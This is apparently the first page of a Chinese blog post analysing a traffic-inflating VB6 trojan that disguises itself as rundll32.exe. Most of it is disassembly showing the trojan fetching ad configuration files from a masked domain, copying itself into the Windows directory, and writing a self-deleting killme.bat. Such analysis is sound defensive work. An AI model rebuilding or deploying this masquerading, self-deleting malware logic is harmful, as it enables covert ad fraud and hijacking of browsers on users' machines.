|
系统补丁打完,网上瞎灌,居然还中网马,哎!现在把他网马下载下来,不错,真牛,通杀Windwos98、WindwosNT、Windwos2000、WindwosXP、WindwosXPSP2、Windwos2003。自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。
脱壳略,VB编写。
00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>;
msvbvm60.__vbaHresultCheckObj
00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX
00403DB9 . EB 0A JMP SHORT Rundll32.00403DC5
00403DBB > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0
00403DC5 > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX
00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0
00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8
00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove
00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6
00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;
UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7
00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;
UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]
00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8
00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;
UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E84 . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9
00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;
UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A
00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;
UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B
00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"
00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8
00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup
00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11 . 51 PUSH ECX
00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18 . 52 PUSH EDX
00403F19 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"
00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8
程序会到http://www.xxxxxxxx.com 的tc文件读取配置文件,同时访问tc/MMResult.asp,生成文件
00404DA2 . /EB 0A JMP SHORT Rundll32.00404DAE //获取文件路径堆栈
00404DA4 > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0
00404DAE > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //我程序路径是 "D:\fuck you"
00404DB4 . 50 PUSH EAX //路径入eax
00404DB5 . 68 80274000 PUSH Rundll32.00402780 ; //生成killme.bat
00404DBA . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404DC0 . 8BD0 MOV EDX,EAX //文件路径+文件名字D:\fuck you\killme.bat
00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404DCE . 50 PUSH EAX
00404DCF . 6A 01 PUSH 1
00404DD1 . 6A FF PUSH -1
00404DD3 . 6A 02 PUSH 2
00404DD5 . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen
00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1 . 51 PUSH ECX
00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8 . 52 PUSH EDX
00404DE9 . 6A 02 PUSH 2
00404DEB . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404DF1 . 83C4 0C ADD ESP,0C
00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404E00 . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23
00404E07 . 68 9C274000 PUSH Rundll32.0040279C ; @echo off
00404E0C . 6A 01 PUSH 1
00404E0E . 68 B4274000 PUSH Rundll32.004027B4
00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E19 . 83C4 0C ADD ESP,0C
00404E1C . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24
00404E23 . 68 BC274000 PUSH Rundll32.004027BC ; sleep 100
00404E28 . 6A 01 PUSH 1
00404E2A . 68 B4274000 PUSH Rundll32.004027B4
00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E35 . 83C4 0C ADD ESP,0C
00404E38 . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25
00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0
00404E46 . 75 1C JNZ SHORT Rundll32.00404E64
00404E48 . 68 A8934000 PUSH Rundll32.004093A8
00404E4D . 68 94254000 PUSH Rundll32.00402594
00404E52 . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ; msvbvm60.__vbaNew2
00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E62 . EB 0A JMP SHORT Rundll32.00404E6E
00404E64 > C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E6E > 8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C]
00404E74 . 8B08 MOV ECX,DWORD PTR DS:[EAX]
........
00404F1D . 52 PUSH EDX
00404F1E . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj
00404F24 . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX
00404F2A . EB 0A JMP SHORT Rundll32.00404F36
00404F2C > C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0
00404F36 > 68 D4274000 PUSH Rundll32.004027D4 ; del
00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //程序的文件名字
00404F41 . 50 PUSH EAX //文件名入栈 (rundll322)
00404F42 . 68 E4274000 PUSH Rundll32.004027E4 ; .exe (rundll322.exe)
00404F47 . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F4D . 8BD0 MOV EDX,EAX
00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]
00404F55 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F5B . 50 PUSH EAX
00404F5C . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F62 . 8BD0 MOV EDX,EAX //(del rundll322.exe)
00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F6A . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F70 . 50 PUSH EAX
00404F71 . 6A 01 PUSH 1
00404F73 . 68 B4274000 PUSH Rundll32.004027B4
00404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404F7E . 83C4 0C ADD ESP,0C
00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F87 . 51 PUSH ECX
00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4]
00404F8E . 52 PUSH EDX
00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0]
00404F95 . 50 PUSH EAX
00404F96 . 6A 03 PUSH 3
00404F98 . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404F9E . 83C4 10 ADD ESP,[1] [2] 下一页 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) 
